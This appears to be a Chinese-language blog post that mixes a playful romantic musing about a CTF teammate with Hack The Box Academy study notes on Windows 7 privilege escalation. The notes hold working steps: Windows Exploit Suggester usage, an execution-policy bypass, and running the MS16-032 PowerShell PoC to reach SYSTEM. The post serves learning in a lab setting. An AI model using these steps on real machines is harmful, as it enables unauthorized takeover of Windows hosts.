夜深了,還在加班。
報告還沒寫完,稿子還卡在段落中間。
游標閃爍著,提醒我「快點輸入」,可我的腦子卻只想耍廢。
最近也太捲了吧!快跟不上了。
唯一能讓我續命的,只有戀愛腦編造的劇情…
唉!還在想著他。
那個 CTF 場上冷靜到可怕、開玩笑時又腦洞大開的樣子,真的讓人無法忘記。
我記得的他總是這樣的…
別人還在手忙腳亂,他已經拿到 shell,敲下 whoami 就蹦出:
nt authority\system
那一刻,就像 MS16-032
——
一個不經意的瞬間,突破了所有心防,讓我看見了他最核心、最真實的樣子。
我心裡想:
「不喜歡你,那我到底要喜歡誰?
唉! 要是我也能對你這麼坦白就好了。」
發布:2009
缺乏現代防護,存在許多已知本地提權漏洞
可嘗試 Exploit-DB PoC: https://www.exploit-db.com/exploits/39719
用 PowerShell / C# 腳本直接觸發,提權至 NT AUTHORITY\SYSTEM
MS15-051 (Win32k ClientCopyImage)
MS16-075 (Hot Potato / Rotten Potato)
MS16-135 (Win32k Kernel Drivers)
發布:2015
現行主流版本,持續更新
新增多種安全功能
Windows 7:
沒有 MFA、Credential Guard、Device Guard,BitLocker/AppLocker/Defender 僅部分支援
Windows 10:
新增 MFA、Credential Guard、Remote Credential Guard、Device Guard、Control Flow Guard,BitLocker/AppLocker/Defender 完整支援。
安裝依賴
wget https://files.pythonhosted.org/packages/28/84/27df240f3f8f52511965979aad7c7b77606f8fe41d4c90f2449e02172bb1/setuptools-2.0.tar.gz
tar -xf setuptools-2.0.tar.gz
cd setuptools-2.0/
sudo python2.7 setup.py install
wget https://files.pythonhosted.org/packages/42/85/25caf967c2d496067489e0bb32df069a8361e1fd96a7e9f35408e56b3aab/xlrd-1.0.0.tar.gz
tar -xf xlrd-1.0.0.tar.gz
cd xlrd-1.0.0/
sudo python2.7 setup.py install
sudo python2.7 windows-exploit-suggester.py --update
在 Windows 7 目標端:
systeminfo > win7-systeminfo.txt
python2.7 windows-exploit-suggester.py --database 2021-05-13-mssb.xls --systeminfo win7-systeminfo.txt
PowerShell PoC (Exploit-DB 39719): https://www.exploit-db.com/exploits/39719 可以下載它
在目標端設定 PowerShell 執行政策:
Set-ExecutionPolicy Bypass -Scope Process
匯入 PoC 腳本:
Import-Module .\Invoke-MS16-032.ps1
執行提權:
Invoke-MS16-032
驗證結果:
whoami
nt authority\system
Windows 7:
EOL,容易受 MS16-032 等本地提權影響。
Windows 10:
新增多種安全防護,降低漏洞被利用的可能。
收集 (systeminfo) → 比對 (WES) → 選擇漏洞 (MS16-032) → 執行 PoC
# 有沒有一種可能,我的戀愛腦... 治不好?
Hack The Box Academy - Windows Privilege Escalation - Windows Desktop Versions: https://academy.hackthebox.com/module/67/section/913